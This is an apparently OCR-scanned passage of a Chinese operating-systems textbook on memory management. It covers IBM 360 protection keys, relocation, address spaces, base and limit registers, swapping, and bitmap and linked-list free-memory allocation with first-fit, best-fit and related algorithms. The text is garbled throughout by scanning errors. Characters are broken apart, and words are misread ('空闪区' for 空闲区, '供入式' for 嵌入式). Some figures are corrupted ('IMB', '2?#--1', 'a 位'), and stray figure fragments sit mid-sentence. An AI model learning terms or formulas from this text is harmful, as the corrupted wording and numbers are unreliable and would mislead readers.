却 没 有 被 广泛 使 用 ， 因 为 人 们 通常 希望 能 够 在 同一 时 间 运 行 没 有 关联 的 程序 ， 而 这 正 是 线程 抽象 所 不 能 
提供 的 。 更 进一步 地 ， 一 个 没有 存储 器 抽象 的 系统 也 不 大 可 能 具有 线程 抽象 的 功能 。 

在 不 使 用 存储 器 抽象 的 情况 下 运行 多 个 程序 

但 是 ， 即 使 没有 存储 器 抽象 ， 同 时 运行 多 个 程序 也 是 可 能 的 。 操 作 系 统 只 需要 把 当前 内 存 中 所 有 内 
容 保存 到 磁盘 文件 中 ， 然 后 把 下 一 个 程序 读 入 到 内 存 中 再 运行 即 可 。 只 要 在 某 一 个 时 间 内 存 中 只 有 一 个 
程序 ， 那 么 就 不 会 发 生 冲 突 。 这 样 的 交换 概念 会 在 下 面 讨 论 。 

在 特殊 硬件 的 帮助 下 ， 即 使 没有 交换 功能 ， 并 发 地 运行 多 个 程序 也 是 可 能 的 。IBM 360 的 早期 模型 
是 这 样 解决 的 : 内 存 被 划分 为 2KB 的 块 ， 每 个 块 被 分 配 一 个 4 位 的 保护 键 ， 保 护 键 存储 在 CPU 的 特殊 寄 
存 器 中 。 一 个 内 存 为 IMB 的 机 器 只 需要 512 个 这 样 的 4 位 寄存 器 ， 容 量 总 共 为 256 字 节 。PSW (Program 
Status Word， 程 序 状态 字 ) 中 存 有 一 个 4 位 码 。 一 个 运行 中 的 进程 如 果 访 问 保护 键 与 其 PSW 码 不 同 的 内 
存 ，360 的 硬件 会 捕获 到 这 一 事件 。 因 为 只 有 操作 系统 可 以 修改 保护 键 ， 这 样 就 可 以 防止 用 户 进程 之 间 、 
用 户 进程 和 操作 系统 之 间 的 互相 干扰 。 

然而 ， 这 种 解决 方法 有 一 个 重要 的 缺陷 。 如 图 3-2 所 示 ， 假 设 有 两 个 程序 ， 每 个 大 小 各 为 16KB ， 如 
图 3-2a 和 图 3-2b 所 示 。 前 者 加 了 阴影 表示 它 和 后 者 使 用 不 同 的 内 存 键 。 第 一 个 程序 一 开始 就 跳 转 到 地 
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图 3-2 重 定位 问题 的 说 明 : a) 一 个 16KB 程 序 ，b) 另 一 个 16KB 程 序 ，c) 两 个 程序 连续 地 装载 到 内 存 中 
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址 24， 那 里 是 一 条 MOV 指 令 。 第 二 个 程序 一 开始 跳 转 到 地 址 28， 那 里 是 一 条 CMP 指 令 。 与 讨论 无 关 的 
指令 没有 画 出 来 。 当 两 个 程序 被 连续 地 装载 到 内 存 中 从 0 开始 的 地 址 时 ， 内 存 中 的 状态 就 如 同 图 3-2c 所 
示 。 在 这 个 例子 里 ， 我 们 假设 操作 系统 是 在 高 地 址 处 ， 图 中 没有 画 出 来 。 

程序 装载 完毕 之 后 就 可 以 运行 了 。 由 于 它们 的 内 存 键 不 同 ， 它 们 不 会 破坏 对 方 的 内 存 。 但 在 另 一 方 
面 会 发 生 问题 。 当 第 一 个 程序 开始 运行 时 ， 它 执行 了 JMP 24484, 然后 不 出 预料 地 跳 转 到 了 相应 的 指令 ， 
这 个 程序 会 正常 运行 。 

但 是 ， 当 第 一 个 程序 已 经 运行 了 一 段 时 间 后 ， 操 作 系统 可 能 会 决定 开始 运行 第 二 个 程序 ， 即 装载 在 
第 一 个 程序 之 上 的 地 址 16 384 处 的 程序 。 这 个 程序 的 第 一 条 指令 是 JMP 28， 这 条 指令 会 使 程序 跳 转 到 第 
一 个 程序 的 ADD 指 令 ， 而 不 是 事先 设 定 的 跳 转 到 CMP 指 令 。 由 于 对 内 存 地 址 的 不 正确 访问 ， 这 个 程序 
很 可 能 在 1 秒 之 内 就 崩溃 了 。 

这 里 关键 的 问题 是 这 两 个 程序 都 引用 了 绝对 物理 地 址 ， 而 这 正 是 最 需要 避免 的 。 我 们 希望 每 个 程序 
都 使 用 一 套 私 有 的 本 地 地 址 来 进行 内 存 寻 址 。 下 面 我 们 会 展示 这 种 技术 是 如 何 实现 的 。IBM 360 对 上 述 
问题 的 补救 方案 就 是 在 第 二 个 程序 装载 到 内 存 的 时 候 ， 使 用 静态 重 定位 的 技术 修改 它 。 它 的 工作 方式 如 
下 : 当 一 个 程序 被 装载 到 地 址 16384 时 ， 常 数 16384 被 加 到 每 一 个 程序 地 址 上 。 虽 然 这 个 机 制 在 不 出 错误 
的 情况 下 是 可 行 的 ， 但 这 不 是 一 种 通用 的 解决 办 法 ， 同 时 会 减 慢 装载 速度 。 而 且 ， 它 要 求 给 所 有 的 可 执 
行程 序 提供 额外 的 信息 来 区 分 哪些 内 存 字 中 存 有 (可 重 定 位 的 ) 地 址 ， 哪 些 没 有 。 毕 竟 ， 图 3-2b 中 的 
“28” 需 要 被 重 定位 ， 但 是 像 

MOV REGISTER1，28 


这 样 把 数 28 送 到 REGISTER1 的 指令 不 可 以 被 重 定位 。 装 载 器 需要 一 定 的 方法 来 辨别 地 址 和 常数 。 

最 后 ， 正 如 我 们 在 第 1 章 中 指出 的 ， 计 算 机 世界 的 发 展 总 是 倾向 于 重复 历史 。 虽 然 直接 引用 物理 地 
址 对 于 大 型 计算 机 、 小 型 计算 机 、 台 式 计算 机 和 笔记 本 电脑 来 说 已 经 成 为 很 久远 的 记忆 了 (对 此 我 们 深 
表 遗 憾 )， 但 是 缺少 存储 器 抽象 的 情况 在 嵌入 式 系 统 和 智能 卡 系统 中 还 是 很 常见 的 。 现 在 ， 像 收音 机 、 
洗衣 机 和 微波 炉 这 样 的 设备 都 已 经 完全 被 (ROM 形式 的 ) 软件 控制 ， 在 这 些 情况 下 ， 软 件 都 采用 访问 
绝对 内 存 地 址 的 寻 址 方式 。 在 这 些 设备 中 这 样 能 够 正常 工作 是 因为 ， 所 有 运行 的 程序 都 是 可 以 事先 确定 
的 ， 用 户 不 可 能 在 烤 面 包机 上 自由 地 运行 他 们 自己 的 软件 。 

虽然 高 端的 供 入 式 系统 (比如 智能 手机 ) 有 复杂 的 操作 系统 , 但 是 一 般 的 简单 做 入 式 系 统 并 非 如 此 。 
在 某 些 情况 下 可 以 用 一 种 简单 的 操作 系统 ， 它 只 是 一 个 被 链接 到 应 用 程序 的 库 ， 该 库 为 程序 提供 IO 和 
其 他 任务 所 需要 的 系统 调用 。 操 作 系 统 作为 库 实现 的 常见 例子 如 流行 的 e-Cos 操 作 系 统 。 


3.2 一 种 存储 器 抽象 .地址 空间 


总 之 ， 把 物理 地 址 暴露 给 进程 会 带 来 下 面 几 个 严重 问题 。 第 一 ， 如 果 用 户 程序 可 以 寻 址 内 存 的 每 个 
字 节 ， 它 们 就 可 以 很 容易 地 (故意 地 或 偶然 地 ) 破坏 操作 系统 ， 从 而 使 系统 慢 慢 地 停止 运行 (除非 使 用 
特殊 的 硬件 进行 保护 ， 如 IBM 360 的 锁 键 模式 )。 即 使 在 只 有 一 个 用 户 进程 运行 的 情况 下 ， 这 个 问题 也 是 
存在 的 。 第 二 ， 使 用 这 种 模型 ， 想 要 同时 运行 (如 果 只 有 一 个 CPU 就 轮流 执行 ) 多 个 程序 是 很 困难 的 。 
在 个 人 计算 机 上 ， 同 时 打开 几 个 程序 是 很 常见 的 (一 个 文字 处 理 器 ， 一 个 邮件 程序 ， 一 个 网 络 浏览 器 )， 
其 中 一 个 当前 正在 工作 ， 其 余 的 在 按 下 鼠标 的 时 候 才 会 被 激活 。 在 系统 中 没有 对 物理 内 存 的 抽象 的 情况 
下 ， 很 难 实现 上 述 情景 ， 因 此 ， 我 们 需要 其 他 办 法 。 f 


3.2.1 地 址 空间 的 概念 

要 使 多 个 应 用 程序 同时 处 于 内 存 中 并 且 不 互相 影响 ， 需 要 解决 两 个 问题 : 保护 和 重 定位 。 我 们 来 看 
一 个 原始 的 对 前 者 的 解决 办 法 ， 它 曾 被 用 在 IBM 360 上 : 给 内 存 块 标记 上 一 个 保护 键 ， 并 且 比较 执行 进 
程 的 键 和 其 访问 的 每 个 内 存 字 的 保护 键 。 然 而 ， 这 种 方法 本 身 并 没有 解决 后 一 个 问题 ， 虽 然 这 个 问题 可 
以 通过 在 程序 被 装载 时 重 定位 程序 来 解决 ， 但 这 是 一 个 缓慢 且 复杂 的 解决 方法 。 

一 个 更 好 的 办 法 是 创造 一 个 新 的 存储 器 抽象 : 地 址 空间 。 就 像 进 程 的 概念 创造 了 一 类 抽象 的 CPU 以 
运行 程序 一 样 ， 地 址 空间 为 程序 创造 了 一 种 抽象 的 内 存 。 地 址 空间 是 一 个 进程 可 用 于 寻 址 内 存 的 一 套 地 
址 集合 。 每 个 进程 都 有 一 个 自己 的 地 址 空间 ， 并 且 这 个 地 址 空间 独立 于 其 他 进程 的 地 址 空间 (除了 在 一 
些 特 殊 情 况 下 进程 需要 共享 它们 的 地 址 空间 外 ) 。 
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地 址 空间 的 概念 非常 通用 ， 并 且 在 很 多 场合 中 出 现 。 比 如 电话 号 码 ， 在 美国 和 很 多 其 他 国家 ， 一 个 
本 地 电话 号 码 通常 是 一 个 7 位 的 数字 。 因 此 ， 电 话 号 码 的 地 址 空间 是 从 0 000 000 到 9 999 999， 虽 然 一 些 
号 码 并 没有 被 使 用 ， 比 如 以 000 开 头 的 号 码 。 随 着 手机 、 调 制 解 调 器 和 传真 机 数量 的 增长 ， 这 个 空间 变 
得 越 来 越 不 够 用 了 ， 从 而 导致 需要 使 用 更 多 位 数 的 号 码 。X86 的 IO 端口 的 地 址 空间 从 0 到 16 383, IPv4 
的 地 址 是 32 位 的 数字 ， 因 此 它们 的 地 址 空间 从 0 到 2?#--1 (也 有 一 些 保留 数字 )。 

地 址 空间 也 可 以 是 非 数 字 的 ， 以 “.com” 结 尾 的 网 络 域名 的 集合 也 是 地 址 空间 。 这 个 地 址 空间 是 由 
所 有 包含 2~63 个 字符 并 且 后 面 跟 着 “.com” 的 字符 串 组 成 的 ， 组 成 这 些 字 符 串 的 字符 可 以 是 字母 、 数 字 
和 连 字 符 。 到 现在 你 应 该 已 经 明白 地 址 空间 的 概念 了 ， 它 是 很 简单 的 。 

比较 难 的 是 给 每 个 程序 一 个 自己 独 有 的 地 址 空间 ， 使 得 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 
址 与 另 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 址 不 同 。 下 面 我 们 将 讨论 一 个 简单 的 方法 ， 这 个 方法 
曾经 很 常见 ， 但 是 在 有 能 力 把 更 复杂 (而 且 更 好 ) 的 机 制 运用 在 现代 CPU 芯片 上 之 后 ， 这 个 方法 就 
不 再 使 用 了 。 

基 址 寄存 器 与 界限 寄存 器 

这 个 简单 的 解决 办 法 是 使 用 动态 重 定 位 , 简单 地 把 每 个 进程 的 地 址 空间 映射 到 物理 内 存 的 不 同 部 分 。 
从 CDC 6600 (世界 上 最 早 的 超级 计算 机 ) 到 Intel 8088 (原始 IBM PC 的 心脏 )， 所 使 用 的 经 典 办 法 是 给 
每 个 CPU 配 置 两 个 特殊 硬件 寄存 器 ， 通 常 叫 作 基 址 寄存 器 和 界限 寄存 器 。 当 使 用 基 址 寄存 器 和 界限 寄存 
器 时 ， 程 序 装载 到 内 存 中 连续 的 空间 位 置 且 装载 期 间 无 须 重 定 位 ， 如 图 3-2c 所 示 。 当 一 个 进程 运行 时 ， 
程序 的 起 始 物 理 地 址 装载 到 基 址 寄存 器 中 ， 程 序 的 长 度 装载 到 界限 寄存 器 中 。 在 图 3-2c 中 ， 当 第 一 个 程 
序 运 行 时 ， 装 载 到 这 些 硬件 寄存 器 中 的 基 址 和 界限 值 分 别 是 0 和 16 384。 当 第 二 个 程序 运行 时 ， 这 些 值 
分 别 是 16 384 和 32 768。 如 果 第 三 个 16KB 的 程序 被 直接 装载 在 第 二 个 程序 的 地 址 之 上 并 且 运 行 ， 这 时 基 
址 寄存 器 和 界限 寄存 器 里 的 值 会 是 32 768 和 16 384。 

每 次 一 个 进程 访问 内 存 ， 取 一 条 指令 ， 读 或 写 一 个 数据 字 ，CPU 硬 件 会 在 把 地 址 发 送 到 内 存 总 线 前 ， 
自动 把 基 址 值 加 到 进程 发 出 的 地 址 值 上 。 同 时 ， 它 检查 程序 提供 的 地 址 是 否 等 于 或 大 于 界限 寄存 器 里 的 值 。 
如 果 访 问 的 地 址 超过 了 界限 ， 会 产生 错误 并 中 止 访问 。 这 样 ， 对 图 3-2c 中 第 二 个 程序 的 第 一 条 指令 ， 程 序 
执行 


sides 
指令 ， 但 是 硬件 把 这 条 指令 解释 成 C o joes 


JMP 16412 界限 寄存 器 
所 以 程序 如 我 们 所 愿 地 跳 转 到 了 CMP 指 令 。 在 图 3-2c 中 第 
二 个 程序 的 执行 过 程 中 ， 基 址 寄存 器 和 界限 寄存 器 的 设置 
如 图 3-3 所 示 。 

使 用 基 址 寄存 器 和 界限 寄存 器 是 给 每 个 进程 提供 私有 
地 址 空间 的 非常 容易 的 方法 ， 因 为 每 个 内 存 地 址 在 送 到 内 
存 之 前 ， 都 会 自动 先 加 上 基 址 寄存 器 的 内 容 。 在 很 多 实际 
系统 中 ， 对 基 址 寄存 器 和 界限 寄存 器 会 以 一 定 的 方式 加 以 
保护 ， 使 得 只 有 操作 系统 可 以 修改 它们 。 在 CDC 6600 中 就 基 址 寄存 器 
提供 了 对 这 些 寄 存 器 的 保护 ， 但 在 Intel 8088 中 则 没有 ， 甚 i 
至 没有 界限 寄存 器 。 但 是 ，Intel 8088 提 供 了 多 个 基 址 寄存 | 20 
器 ， 使 程序 的 代码 和 数据 可 以 被 独立 地 重 定 位 ， 但 是 没有 BW Ee 
提供 引用 地 址 越界 的 预防 机 制 。 

使 用 基 址 寄存 器 和 界限 寄存 器 重 定位 的 缺点 是 ， 每 次 
访问 内 存 都 需要 进行 加 法 和 比较 运算 。 比 较 运算 可 以 做 得 Eee O 
很 快 ， 但 是 加 法 运算 由 于 进位 传递 时 间 的 问题 ， 在 没有 使 《图 3-3 基 址 寄存 器 和 界限 寄存 器 可 用 于 为 
用 特殊 电路 的 情况 下 会 显得 很 慢 。 每 个 进程 提供 一 个 独立 的 地 址 空间 
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3.2.2 交换 技术 

如 果 计 算 机 物理 内 存 足 够 大 ， 可 以 保存 所 有 进程 ， 那么 之 前 提 及 的 所 有 方案 都 或 多 或 少 是 可 行 的 。 
但 实际 上 , 所 有 进程 所 需 的 RAM 数 量 总 和 通常 要 远 远 超出 存储 器 能 够 支持 的 范围 。 在 一 个 典型 的 Windows、 
OS X 或 Linux 系 统 中 ， 在 计算 机 完成 引导 后 会 启动 30~100 个 甚至 更 多 的 进程 。 例 如 ， 当 一 个 Windows 应 
用 程序 安装 后 ， 通 常会 发 出 一 系列 命令 ， 使 得 在 此 后 的 系统 引导 中 会 启动 一 个 仅仅 用 于 查看 该 应 用 程序 
更 新 的 进程 。 这 样 一 个 进程 会 轻易 地 占据 5~10MB 的 内 存 。 其 他 后 台 进程 还 会 查看 所 收 到 的 邮件 和 进来 
的 网 络 连接 ， 以 及 其 他 很 多 诸如 此 类 的 任务 。 并 且 ， 这 一 切 都 发 生 在 第 一 个 用 户 程序 启动 之 前 。 当 前 重 
要 的 应 用 程序 如 Photoshop 一 启动 就 轻易 地 占据 300MB 内 存 ， 而 开始 处 理 数据 后 可 能 需要 数 千 兆 字 节 
(GB) 的 空间 。 因 此 ， 把 所 有 进程 一 直 保存 在 内 存 中 需要 巨大 的 内 存 ， 如 果 内 存 不 够 ， 就 做 不 到 这 一 点 。 

有 两 种 处 理 内 存 超载 的 通用 方法 。 最 简单 的 策略 是 交换 (swapping) 技术 ， 即 把 一 个 进程 完整 调和 
内 存 ， 使 该 进程 运行 一 段 时 间 ， 然 后 把 它 存 回 磁盘 。 空 闲 进程 主要 存储 在 磁盘 上 ， 所 以 当 它 们 不 运行 时 
就 不 会 占用 内 存 (尽管 其 中 的 一 些 进程 会 周期 性 地 被 唤醒 以 完成 相关 工作 ， 然 后 就 又 进入 睡眠 状态 )。 
另 一 种 策略 是 虚拟 内 存 (virtual memory ) ， 该 策略 其 至 能 使 程序 在 只 有 一 部 分 被 调 入 内 存 的 情况 下 运行 。 
下 面 先 讨论 交换 技术 ，3.3 节 我 们 将 考察 虚拟 内 存 。 

交换 系统 的 操作 如 图 3-4 所 示 。 开 始 时 内 存 中 只 有 进程 A。 之 后 创建 进程 B 和 C 或 者 从 磁盘 将 它们 换 
入 内 存 。 图 3-4d 显 示 A 被 交换 到 磁盘 。 然 后 D 被 调 入 ，B 被 调 出 ， 最 后 A 再 次 被 调和 信 。 由 于 A 的 位 置 发 生 
变化 ， 所 以 在 它 换 入 的 时 候 通 过 软件 或 者 在 程序 运行 期 间 (多 数 是 这 种 情况 ) 通过 硬件 对 其 地 址 进行 重 
定位 。 例 如 ， 基 址 寄存 器 和 界限 寄存 器 就 适用 于 这 种 情况 。 


时 间 一 ~ 





图 3-4 内 存 分 配 情况 随 着 进程 进出 而 变化 ， 阴 影 区 域 表示 未 使 用 的 内 存 


交换 在 内 存 中 产生 了 多 个 空闲 区 (hole， 也 称 为 空洞 ) ， 通 过 把 所 有 的 进程 尽 可 能 向 下 移动 ， 有 可 
能 将 这 些小 的 空闲 区 合成 一 大 块 。 该 技术 称 为 内 存 紧 缩 (memory compaction) 。 通 常 不 进行 这 个 操作 ， 
因为 它 要 耗费 大 量 的 CPU 时 间 。 例 如 ， 一 台 有 16GB 内 存 的 计算 机 可 以 每 ns 复制 8 个 字 节 ， 它 紧缩 全 部 
内 存 大 约 要 花费 16s。 

有 一 个 问题 值得 注意 ， 即 当 进程 被 创建 或 换 和 时 应 该 为 它 分 配 多 大 的 内 存 。 若 进程 创建 时 其 
大 小 是 固定 的 并 且 不 再 改变 ， 则 分 配 很 简单 ， 操 作 系统 准确 地 按 其 需要 的 大 小 进行 分 配 ， 不 多 也 
不 少 。 

但 是 如 果 进 程 的 数据 段 可 以 增长 ， 例 如 ， 很 多 程序 设计 语言 都 允许 从 堆 中 动态 地 分 配 内 存 ， 那 么 当 
进程 空间 试图 增长 时 ， 就 会 出 现 问题 。 若 进程 与 一 个 空闲 区 相 邻 ,那么 可 把 该 空闲 区 分 配给 进程 供 其 增 大 。 
另 一 方面 ， 若 进程 相 邻 的 是 另 一 个 进程 ， 那 么 要 么 把 需要 增长 的 进程 移 到 内 存 中 一 个 足够 大 的 区 域 中 去 ， 
要 么 把 一 个 或 多 个 进程 交换 出 去 ， 以 便 生成 一 个 足够 大 的 空 闪 区 。 若 一 个 进程 在 内 存 中 不 能 增长 ， 而 且 磁 
盘 上 的 交换 区 也 已 满 了 ， 那 么 这 个 进程 只 有 挂 起 直到 一 些 空间 空 闪 (或 者 可 以 结束 该 进程 ) 。 

如 果 大 部 分 进程 在 运行 时 都 要 增长 ， 为 了 减少 因 内 存 区 域 不 够 而 引起 的 进程 交换 和 移动 所 产生 的 开 
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销 ， 一 种 可 用 的 方法 是 ， 当 换 入 或 移动 进程 时 为 它 分 配 一 些 额外 的 内 存 。 然 而 ， 当 进程 被 换 出 到 磁盘 上 
时 ， 应 该 只 交换 进程 实际 上 使 用 的 内 存 中 的 内 容 ， 将 额外 的 内 存 交换 出 去 是 一 种 浪费 。 在 图 3-5a 中 读者 
可 以 看 到 一 种 已 为 两 个 进程 分 配 了 增长 空间 的 内 存 配置 。 





| wm } 为 增长 预 留 的 空间 
| seni 
为 增长 预 留 的 空间 】 为 增长 预 留 的 空间 
| scenic 





a) 


图 3-5 a) 为 可 能 增长 的 数据 段 预 留 空间 ，b) 为 可 能 增长 的 数据 段 和 堆栈 段 预 留 空间 


如 果 进 程 有 两 个 可 增长 的 段 ， 例 如 ， 供 变量 动态 分 配 和 释放 的 作为 堆 使 用 的 一 个 数据 段 ， 以 及 存放 
普通 局 部 变量 与 返回 地 址 的 一 个 堆栈 段 ， 则 可 使 用 另 一 种 安排 ， 如 图 3-5b 所 示 。 在 图 中 可 以 看 到 所 示 进 
程 的 堆栈 段 在 进程 所 占 内 存 的 顶端 并 向 下 增长 ， 紧 接 在 程序 段 后 面 的 数据 段 向 上 增长 。 在 这 两 者 之 间 的 
内 存 可 以 供 两 个 段 使 用 。 如 果 用 完了 ， 进 程 或 者 必须 移动 到 足够 大 的 空闲 区 中 ( 它 可 以 被 交换 出 内 存 直 
到 内 存 中 有 足够 的 空间 ) ， 或 者 结束 该 进程 。 

3.2.3 空闲 内 存 管理 

在 动态 分 配 内 存 时 ， 操 作 系统 必须 对 其 进行 管理 。 一 般 而 言 ， 有 两 种 方法 跟踪 内 存 使 用 情况 : 位 图 
和 空闲 区 链表 。 在 本 节 和 下 一 节 中 将 介绍 这 两 种 方法 。 第 10 章 将 详细 介绍 Linux 系 统 中 使 用 的 一 些 特定 
的 内 存 分 配器 (如 伙伴 分 配器 和 slab 分 配器 ) 。 

.1. 使 用 位 图 的 存储 管理 

使 用 位 图 方法 时 ， 内 存 可 能 被 划分 成 小 到 几 个 字 或 大 到 几 千 字 节 的 分 配 单元 。 每 个 分 配 单元 对 应 于 
位 图 中 的 一 位 ，0 表 示 空 闲 ，! 表 示 占 用 (或 者 相反 )。 一 块 内 存 区 和 其 对 应 的 位 图 如 图 3-6 所 示 。 
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图 3-6 a) 一 段 有 5 个 进程 和 3 个 空闲 区 的 内 存 ， 刻 度 表 示 内 存 分 配 单元 ， 阴 影 区 域 表 示 空 闲 〈 在 位 图 中 用 0 
表示 ) ，b) 对 应 的 位 图 ，c) 用 空闲 区 链表 表示 的 同样 的 信息 
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分 配 单元 的 大 小 是 一 个 重要 的 设计 因素 。 分 配 单元 越 小 ， 位 图 越 大 。 然 而 即使 只 有 4 个 字 节 大 小 的 
分 配 单元 ，32 位 的 内 存 也 只 需要 位 图 中 的 1 位 。32n 位 的 内 存 需要 a 位 的 位 图 ， 所 以 位 图 只 占用 了 1/32 的 
内 存 。 若 选择 比较 大 的 分 配 单元 ， 则 位 图 更 小 。 但 车 进程 的 大 小 不 是 分 配 单元 的 整数 倍 ， 那 么 在 最 后 一 
个 分 配 单元 中 就 会 有 一 定数 量 的 内 存 被 浪费 了 。 

因为 内 存 的 大 小 和 分 配 单元 的 大 小 决定 了 位 图 的 大 小 ， 所 以 它 提供 了 一 种 简单 的 利用 一 块 固定 大 小 
的 内 存 区 就 能 对 内 存 使 用 情况 进行 记录 的 方法 。 这 种 方法 的 主要 问题 是 ， 在 决定 把 一 个 占 k 个 分 配 单元 
的 进程 调和 内存 时 ， 存 储 管理 器 必须 搜索 位 图 ， 在 位 图 中 找 出 有 k 个 连续 0 的 串 。 查 找 位 图 中 指定 长 度 的 
连续 0 串 是 耗 时 的 操作 (因为 在 位 图 中 该 串 可 能 跨越 字 的 边界 ) ， 这 是 位 图 的 缺点 。 

2. 使 用 链表 的 存储 管理 

另 一 种 记录 内 存 使 用 情况 的 方法 是 ， 维 护 一 个 记录 已 分 配 内 存 段 和 空闲 内 存 段 的 链表 。 其 中 链表 中 
的 一 个 结 点 或 者 包含 一 个 进程 ， 或 者 是 两 个 进程 间 的 一 块 空闲 区 。 可 用 图 3-6c 所 示 的 段 链表 来 表示 图 3- 
6a 所 示 的 内 存 布局 。 链 表 中 的 每 一 个 结 点 都 包含 以 下 域 : 空闲 区 (H) 或 进程 (P) 的 指示 标志 、 起 始 地 
址 、 长 度 和 指向 下 一 结 点 的 指针 。 

在 本 例 中 ， 段 链表 是 按照 地 址 排序 的 ， 其 好 处 是 X 终 止 之 前 X 终 止 之 后 


当 进程 终止 或 被 换 出 时 链表 的 更 新 非常 直接 。 一 个 要 9 we CA] 
终止 的 进程 一 般 有 两 个 邻居 (除非 它 是 在 内 存 的 最 底 da x BZA xe COE 
端 或 最 顶端 )， 它 们 可 能 是 进程 也 可 能 是 空 闪 区 ,这 就 oy st Z=] 
导致 了 图 3-7 所 示 的 四 种 组 合 。 在 图 3-7a 中 更 新 链表 需 ee ee 
要 把 P 赫 换 为 H， 在 图 3-7b 和 图 3-7c 中 两 个 结 点 被 合并 “隐隐 x 区 ek WZ 


为 一 个 ， 链 表 少 了 一 个 结 点 ， 在 图 3-7d 中 三 个 结 点 被 合 。 图 3-7 结束 进程 X 时 与 相 邻 区 域 的 四 种 组 合 
并 为 一 个 ， 从 链表 中 删除 了 两 个 结 点 。 

进程 表 中 表示 终止 进程 的 结 点 中 通常 含有 指向 对 应 于 其 段 链表 结 点 的 指针 ， 因 此 段 链表 使 用 双向 链表 
可 能 要 比 图 3-6c 所 示 的 单 向 链表 更 方便 。 这 样 的 结构 更 易于 找到 上 一 个 结 点 ， 并 检查 是 否 可 以 合并 。 

当 按照 地 址 顺序 在 链表 中 存放 进程 和 空闲 区 时 ， 有 几 种 算法 可 以 用 来 为 创建 的 进程 (或 从 磁盘 换 入 
的 已 存在 的 进程 ) 分 配 内 存 。 这 里 ， 假 设 存储 管理 器 知道 要 为 进程 分 配 多 少 内 存 。 最 简单 的 算法 是 首次 
适 配 (first fit) 算法 。 存 储 管理 器 沿 着 段 链表 进行 搜索 ， 直 到 找到 一 个 足够 大 的 空闲 区 ， 除 非 空闲 区 大 
小 和 要 分 配 的 空间 大 小 正好 一 样 ， 否 则 将 该 空闲 区 分 为 两 部 分 ， 一 部 分 供 进 程 使 用 ， 另 一 部 分 形成 新 的 
空 闪 区 。 首 次 适 配 算法 是 一 种 速度 很 快 的 算法 ， 因 为 它 尽 可 能 少 地 搜索 链表 结 点 。 

对 首次 适 配 算法 进行 很 小 的 修改 就 可 以 得 到 下 次 适 配 (next fit) 算法 。 它 的 工作 方式 和 首次 适 配 算 
法 相同 ， 不 同 点 是 每 次 找到 合适 的 空闲 区 时 都 记录 当时 的 位 置 ， 以 便 在 下 次 寻找 空闲 区 时 从 上 次 结束 的 
地 方 开始 搜索 ， 而 不 是 像 首次 适 配 算法 那样 每 次 都 从 头 开始 。Bays (1977) 的 仿真 程序 证 明 下 次 适 配 算 
法 的 性 能 略 低 于 首次 适 本 算法 。 

另 一 个 著名 的 并 广泛 应 用 的 算法 是 最 佳 适 配 (best fit) 算法 。 最 佳 适 配 算法 搜索 整个 链表 (从 开始 
到 结束 )， 找 出 能 够 容纳 进程 的 最 小 的 空闲 区 。 最 佳 适 配 算法 试图 找 出 最 接近 实际 需要 的 空 亲 区 ， 以 最 
好 地 匹配 请 求 和 可 用 空闲 区 ， 而 不 是 先 拆 分 一 个 以 后 可 能 会 用 到 的 大 的 空闲 区 。 

以 图 3-6 为 例 来 考察 首次 适 配 算法 和 最 佳 适 配 算法 。 假 如 需要 一 个 大 小 为 2 的 块 ， 首 次 适 配 算法 将 分 
配 在 位 置 5 的 空闲 区 ， 而 最 佳 适 配 算法 将 分 配 在 位 置 18 的 空闲 区 。 

因为 每 次 调用 最 佳 适 配 算法 时 都 要 搜索 整个 链表 ， 所 以 它 要 比 首次 适 配 算法 慢 。 让 人 感到 有 点 意外 
的 是 ， 它 比 首次 适 配 算法 或 下 次 适 配 算法 浪费 更 多 的 内 存 ， 因 为 它 会 产生 大 量 无 用 的 小 空 闪 区 。 一 般 情 
况 下 ， 首 次 适 配 算法 生成 的 空闲 区 更 大 一 些 。 

最 佳 适 配 的 空闲 区 会 分 裂 出 很 多 非常 小 的 空闲 区 ， 为 了 避免 这 一 问题 ， 可 以 考虑 最 差 适 配 (worst 
fit) 算法 ， 即 总 是 分 配 最 大 的 可 用 空闲 区 ， 使 新 的 空闲 区 比较 大 从 而 可 以 继续 使 用 。 仿 真 程序 表明 最 关 
适 配 算法 也 不 是 一 个 好 主意 。 

如 果 为 进程 和 空 亲 区 维护 各 自 独立 的 链表 ， 那 么 这 四 个 算法 的 速度 都 能 得 到 提高 。 这 样 就 能 集中 精 
力 只 检查 空闲 区 而 不 是 进程 。 但 这 种 分 配 速度 的 提高 的 一 个 不 可 避免 的 代价 就 是 增加 复杂 度 和 内 存 释放 
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速度 变 慢 ， 因 为 必须 将 一 个 回收 的 段 从 进程 链表 中 删除 并 插入 空闲 区 链表 。 

如 果 进 程 和 空闲 区 使 用 不 同 的 链表 ， 则 可 以 按照 大 小 对 空闲 区 链表 排序 ， 以 便 提 高 最 佳 适 配 算法 的 
速度 。 在 使 用 最 佳 适 配 算法 搜索 由 小 到 大 排列 的 空闲 区 链表 时 ， 只 要 找到 一 个 合适 的 空间 区 ， 则 这 个 空 
闲 区 就 是 能 容纳 这 个 作业 的 最 小 的 空闲 区 ， 因 此 是 最 佳 适 配 。 因 为 空闲 区 链表 以 单 链表 形式 组 织 ， 所 以 
不 需要 进一步 搜索 。 空 闲 区 链表 按 大 小 排序 时 ， 首 次 适 配 算法 与 最 佳 适 配 算法 一 样 快 ， 而 下 次 适 配 算法 
在 这 里 则 毫 无 意义 。 

在 与 进程 段 分 离 的 单独 链表 中 保存 空闲 区 时 ， 可 以 做 一 个 小 小 的 优化 。 不 必 像 图 3-6c 那 样 用 单独 的 
数据 结构 存放 空闲 区 链表 ， 而 可 以 利用 空闲 区 存储 这 些 信息 。 每 个 空闲 区 的 第 一 个 字 可 以 是 空闲 区 大 小 ， 
第 二 个 字 指 向 下 一 个 空闲 区 。 于 是 就 不 再 需要 图 3-6c 中 所 示 的 那些 三 个 字 加 一 位 (P/H) 的 链表 结 点 了 。 

另 一 种 分 配 算法 称 为 快速 适 配 (quick fit) 算法 ， 它 为 那些 常用 大 小 的 空闲 区 维护 单独 的 链表 。 例 如 ， 
有 一 个 mn 项 的 表 ， 该 表 的 第 一 项 是 指向 大 小 为 4KB 的 空闲 区 链表 表 头 的 指针 ， 第 二 项 是 指向 大 小 为 8KB 的 
空闲 区 链表 表 头 的 指针 ， 第 三 项 是 指向 大 小 为 12KB 的 空闲 区 链表 表 头 的 指针 ， 以 此 类 推 。 像 21KB 这 样 
的 空闲 区 既 可 以 放 在 20KB 的 链表 中 ， 也 可 以 放 在 一 个 专门 存放 大 小 比较 特别 的 空闲 区 的 链表 中 。 

